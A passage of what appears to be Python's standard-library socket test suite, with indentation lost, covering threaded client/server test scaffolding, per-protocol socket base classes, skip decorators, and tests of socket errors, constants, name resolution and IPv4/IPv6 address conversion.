bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
